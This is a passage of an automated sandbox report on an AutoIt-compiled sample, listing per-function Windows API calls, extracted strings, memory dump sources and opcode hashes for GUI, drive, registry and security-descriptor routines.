                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 2760611726-4108050209
                                                                                • Opcode ID: c12ef4ab52265684414a8a38ffbff377acb671159a06eaae6812f7cedb094ac5
                                                                                • Instruction ID: 7932e1ab1a774580d86df8f2ea4f34b08042ad884f7bbc9882ddba64e742d70d
                                                                                • Opcode Fuzzy Hash: c12ef4ab52265684414a8a38ffbff377acb671159a06eaae6812f7cedb094ac5
                                                                                • Instruction Fuzzy Hash: 3A12AC30204A61DFDB25DF24E944BBABBA6FF45310F144469F4898B261CB71AC52DF91
                                                                                Function 00652711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32(00000000), ref: 0065273E
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0065286A
                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 006528A9
                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 006528B9
                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00652900
                                                                                • GetClientRect.USER32(00000000,?), ref: 0065290C
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00652955
                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00652964
                                                                                • GetStockObject.GDI32(00000011), ref: 00652974
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00652978
                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00652988
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00652991
                                                                                • DeleteDC.GDI32(00000000), ref: 0065299A
                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 006529C6
                                                                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 006529DD
                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00652A1D
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00652A31
                                                                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00652A42
                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00652A77
                                                                                • GetStockObject.GDI32(00000011), ref: 00652A82
                                                                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00652A8D
                                                                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00652A97
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                • API String ID: 2910397461-517079104
                                                                                • Opcode ID: 925ea1314ceed945477fe77754495672b7e963df0e3aba8523a282f1af4bc29c
                                                                                • Instruction ID: 7379603c2eaabdc55deafd130a12601a13382704d287d8e5a9878e1a40d055b6
                                                                                • Opcode Fuzzy Hash: 925ea1314ceed945477fe77754495672b7e963df0e3aba8523a282f1af4bc29c
                                                                                • Instruction Fuzzy Hash: F3B17E71A00616AFEB14DFA8DC49FAE7BAAFB49711F004116F914EB290D7B0ED40CB90
                                                                                Function 00644ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00644AED
                                                                                • GetDriveTypeW.KERNEL32(?,0066CB68,?,\\.\,0066CC08), ref: 00644BCA
                                                                                • SetErrorMode.KERNEL32(00000000,0066CB68,?,\\.\,0066CC08), ref: 00644D36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: 3f09a3268826cf6e7676a13494722f0b564c12a40b2569ab79d46731024fdf2c
                                                                                • Instruction ID: 6c3e9118fa9a264a6f828e99b58bbbd90491b5de524557a8603fd4d4636437e0
                                                                                • Opcode Fuzzy Hash: 3f09a3268826cf6e7676a13494722f0b564c12a40b2569ab79d46731024fdf2c
                                                                                • Instruction Fuzzy Hash: 266190306062069BCF14DF28CAC7AA9BBA7FF45345B284416F806ABB91DE31DD46DB41
                                                                                Function 006673E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 00667421
                                                                                • SetTextColor.GDI32(?,?), ref: 00667425
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0066743B
                                                                                • GetSysColor.USER32(0000000F), ref: 00667446
                                                                                • CreateSolidBrush.GDI32(?), ref: 0066744B
                                                                                • GetSysColor.USER32(00000011), ref: 00667463
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00667471
                                                                                • SelectObject.GDI32(?,00000000), ref: 00667482
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0066748B
                                                                                • SelectObject.GDI32(?,?), ref: 00667498
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 006674B7
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006674CE
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 006674DB
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0066752A
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00667554
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00667572
                                                                                • DrawFocusRect.USER32(?,?), ref: 0066757D
                                                                                • GetSysColor.USER32(00000011), ref: 0066758E
                                                                                • SetTextColor.GDI32(?,00000000), ref: 00667596
                                                                                • DrawTextW.USER32(?,006670F5,000000FF,?,00000000), ref: 006675A8
                                                                                • SelectObject.GDI32(?,?), ref: 006675BF
                                                                                • DeleteObject.GDI32(?), ref: 006675CA
                                                                                • SelectObject.GDI32(?,?), ref: 006675D0
                                                                                • DeleteObject.GDI32(?), ref: 006675D5
                                                                                • SetTextColor.GDI32(?,?), ref: 006675DB
                                                                                • SetBkColor.GDI32(?,?), ref: 006675E5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: bacf23f2c501507f04907ce5309bcdbdfcee85f625253b200cf18ac6bdd241bc
                                                                                • Instruction ID: c6606cfac0a2bd4ebf67ce7b29994c2d7103196c1b69cd778218df4a4da4974a
                                                                                • Opcode Fuzzy Hash: bacf23f2c501507f04907ce5309bcdbdfcee85f625253b200cf18ac6bdd241bc
                                                                                • Instruction Fuzzy Hash: 06615E72900618AFDF019FA4DC49AEEBFBAEB09320F115115F915AB2A1DBB59940CB90
                                                                                Function 00660FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 00661128
                                                                                • GetDesktopWindow.USER32 ref: 0066113D
                                                                                • GetWindowRect.USER32(00000000), ref: 00661144
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00661199
                                                                                • DestroyWindow.USER32(?), ref: 006611B9
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006611ED
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0066120B
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0066121D
                                                                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 00661232
                                                                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00661245
                                                                                • IsWindowVisible.USER32(00000000), ref: 006612A1
                                                                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 006612BC
                                                                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 006612D0
                                                                                • GetWindowRect.USER32(00000000,?), ref: 006612E8
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 0066130E
                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 00661328
                                                                                • CopyRect.USER32(?,?), ref: 0066133F
                                                                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 006613AA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: 21745402969360441dce20a8038600792233234a193859827132475466800bd3
                                                                                • Instruction ID: 16a0aaac5aeb526c7e51db8e0c3dd49e4c6d828f086ce32e7f2ce024a2178f70
                                                                                • Opcode Fuzzy Hash: 21745402969360441dce20a8038600792233234a193859827132475466800bd3
                                                                                • Instruction Fuzzy Hash: 31B1A071604341AFD710DF64C888BAAFBE6FF85310F04891EF9999B261DB71E844CB91
                                                                                Function 00660241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 006602E5
                                                                                • _wcslen.LIBCMT ref: 0066031F
                                                                                • _wcslen.LIBCMT ref: 00660389
                                                                                • _wcslen.LIBCMT ref: 006603F1
                                                                                • _wcslen.LIBCMT ref: 00660475
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 006604C5
                                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00660504
                                                                                  • Part of subcall function 005EF9F2: _wcslen.LIBCMT ref: 005EF9FD
                                                                                  • Part of subcall function 0063223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00632258
                                                                                  • Part of subcall function 0063223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0063228A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 1103490817-719923060
                                                                                • Opcode ID: 64a567d810fb12a152459ade44833974baa6edcec4e3f0af9876810123b643a0
                                                                                • Instruction ID: 2b3279599b2f471f1a99e2b2247f1a00a9ed6036b0254a988ebcbdfa755fbd98
                                                                                • Opcode Fuzzy Hash: 64a567d810fb12a152459ade44833974baa6edcec4e3f0af9876810123b643a0
                                                                                • Instruction Fuzzy Hash: 27E16C312182029BDB24DF28C55186BB7E6BFC8314F14496DF896AB7A1DB30ED46CB81
                                                                                Function 005E8891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E8968
                                                                                • GetSystemMetrics.USER32(00000007), ref: 005E8970
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005E899B
                                                                                • GetSystemMetrics.USER32(00000008), ref: 005E89A3
                                                                                • GetSystemMetrics.USER32(00000004), ref: 005E89C8
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005E89E5
                                                                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 005E89F5
                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005E8A28
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005E8A3C
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 005E8A5A
                                                                                • GetStockObject.GDI32(00000011), ref: 005E8A76
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 005E8A81
                                                                                  • Part of subcall function 005E912D: GetCursorPos.USER32(?), ref: 005E9141
                                                                                  • Part of subcall function 005E912D: ScreenToClient.USER32(00000000,?), ref: 005E915E
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000001), ref: 005E9183
                                                                                  • Part of subcall function 005E912D: GetAsyncKeyState.USER32(00000002), ref: 005E919D
                                                                                • SetTimer.USER32(00000000,00000000,00000028,005E90FC), ref: 005E8AA8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 939c1bae3cdc5fb3a29e5a168d8ef135d5efad5f7c7f1816298d7215e176cf4f
                                                                                • Instruction ID: a0793b8aaa6d82eb65497ce799cf457f141100d6d346368cd737d89bfe13c841
                                                                                • Opcode Fuzzy Hash: 939c1bae3cdc5fb3a29e5a168d8ef135d5efad5f7c7f1816298d7215e176cf4f
                                                                                • Instruction Fuzzy Hash: FBB17D75A0025A9FDB14DFA8DC45BBE3BB6FB49324F104229FA55EB290DB74A840CF50
                                                                                Function 00630D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00631114
                                                                                  • Part of subcall function 006310F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631120
                                                                                  • Part of subcall function 006310F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 0063112F
                                                                                  • Part of subcall function 006310F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00630B9B,?,?,?), ref: 00631136
                                                                                  • Part of subcall function 006310F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0063114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00630DF5
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00630E29
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630E40
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00630E7A
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00630E96
                                                                                • GetLengthSid.ADVAPI32(?), ref: 00630EAD
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00630EB5
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00630EBC
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00630EDD
                                                                                • CopySid.ADVAPI32(00000000), ref: 00630EE4
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00630F13
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00630F35
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00630F47
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630F6E
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630F75
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630F7E
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630F85
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00630F8E
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630F95
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00630FA1
                                                                                • HeapFree.KERNEL32(00000000), ref: 00630FA8
                                                                                  • Part of subcall function 00631193: GetProcessHeap.KERNEL32(00000008,00630BB1,?,00000000,?,00630BB1,?), ref: 006311A1
                                                                                  • Part of subcall function 00631193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00630BB1,?), ref: 006311A8
                                                                                  • Part of subcall function 00631193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00630BB1,?), ref: 006311B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: e1aa93f94f3e05013bef3ff79905ea739781d6076ea9d6438a9d7414f32b6d1b
                                                                                • Instruction ID: e19e2f5a0d79730985f7d5213c26b11cc41a150813ca17d76c0d8595991e20bf
                                                                                • Opcode Fuzzy Hash: e1aa93f94f3e05013bef3ff79905ea739781d6076ea9d6438a9d7414f32b6d1b
                                                                                • Instruction Fuzzy Hash: B7715F7190020AEFEF209FA5DC44FEEBBBABF05710F148119F959E6291D7719909CBA0
                                                                                Function 0065C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0065C4BD
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0066CC08,00000000,?,00000000,?,?), ref: 0065C544
                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0065C5A4
                                                                                • _wcslen.LIBCMT ref: 0065C5F4
                                                                                • _wcslen.LIBCMT ref: 0065C66F
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0065C6B2
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0065C7C1
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0065C84D
                                                                                • RegCloseKey.ADVAPI32(?), ref: 0065C881
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0065C88E
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0065C960
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 9721498-966354055
                                                                                • Opcode ID: 003afec32f1e1d6d6ccbd4cda62d05385f685bfee550a70ac51db3af06bc5c13
                                                                                • Instruction ID: 469e7ccfdb44d6cfd9f4c2b5985c83a020c999d44f47d9f7725c2f0f47b09f3d
                                                                                • Opcode Fuzzy Hash: 003afec32f1e1d6d6ccbd4cda62d05385f685bfee550a70ac51db3af06bc5c13
                                                                                • Instruction Fuzzy Hash: 15126E356043019FD714DF18C895A6ABBE6FF88725F04885EF8899B3A2DB31ED45CB81
                                                                                Function 0066091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 006609C6
                                                                                • _wcslen.LIBCMT ref: 00660A01
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00660A54
                                                                                • _wcslen.LIBCMT ref: 00660A8A
                                                                                • _wcslen.LIBCMT ref: 00660B06
                                                                                • _wcslen.LIBCMT ref: 00660B81
                                                                                  • Part of subcall function 005EF9F2: _wcslen.LIBCMT ref: 005EF9FD
                                                                                  • Part of subcall function 00632BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00632BFA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1470869604.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.000000000066C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471149612.0000000000692000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471430150.000000000069C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1471614625.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_5d0000_ofZiNLLKZU.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 1103490817-4258414348
                                                                                • Opcode ID: de94c2e8d6b58839b2ad6876732bb34a5eb069232c0bb959219f79bb05443614
                                                                                • Instruction ID: 59ac7c5156c36f96a59c38b65b5dafb84b8b662b8e590bb837fbd47bd5ee8152
                                                                                • Opcode Fuzzy Hash: de94c2e8d6b58839b2ad6876732bb34a5eb069232c0bb959219f79bb05443614
                                                                                • Instruction Fuzzy Hash: 3BE18C352083029FCB14DF29C45096BBBE2BF98354F14896DF8969B362D731ED46CB81
                                                                                Function 0065C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1470989466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true
